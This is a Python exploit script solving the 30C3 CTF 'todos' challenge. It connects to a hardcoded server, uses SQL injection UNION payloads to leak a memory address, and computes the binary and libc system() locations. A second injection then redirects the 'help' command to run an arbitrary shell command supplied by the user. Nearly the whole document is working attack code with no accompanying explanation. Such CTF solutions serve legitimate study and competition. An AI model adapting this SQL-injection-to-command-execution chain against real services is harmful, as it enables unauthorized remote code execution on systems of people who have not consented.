30C3 CTF - todos [300]

1. #!/usr/bin/python
2. import sys, socket
3. from struct import pack
4.  
5. if len(sys.argv) != 2:
6.     print "Usage: %s <cmd>" % sys.argv[0]
7.     sys.exit(-1)
8.  
9. cmd_help_name  = 0x21dc
10. cmd_help_regex = 0x2162
11. system_libc_delta = 0x152b550
12. text_base_delta = 0x19d0
13.  
14. # 30C3 CTF - todos [300]
15. s = socket.create_connection(('88.198.89.199',1234))
16. s.recv(8192)
17. s.send("login bla bla\n")
18. s.recv(8192)
19.  
20. # leak pointer
21. s.send("search ' AND 1=2 UNION ALL (select table_name from information_schema.tables LIMIT 10) UNION ALL select 0x0e000000 #\n")
22. s.recv(8192)
23. s.send("show 11\n")
24. data = s.recv(8192)
25.  
26. # parse offset
27. addr = int(data[4:-1][::-1].encode('hex'), 16)
28. base = addr - text_base_delta
29.  
30. # convert to hex strings
31. cmd = pack("<Q", base + cmd_help_name).encode('hex')
32. regex = pack("<Q", base + cmd_help_regex).encode('hex')
33. system = pack("<Q", base - system_libc_delta).encode('hex')
34.  
35. # exploit
36. s.send("search ' AND 1=2 UNION ALL SELECT 0x41 FROM information_schema.tables LIMIT 10 UNION ALL SELECT 0x0200000000000000%s%s%s%s #\n" % ("A"*16, cmd, regex, system))
37. s.recv(8192)
38. s.send("help " + sys.argv[1] + "\n")
39. print s.recv(8192).strip()
40.  
41. s.close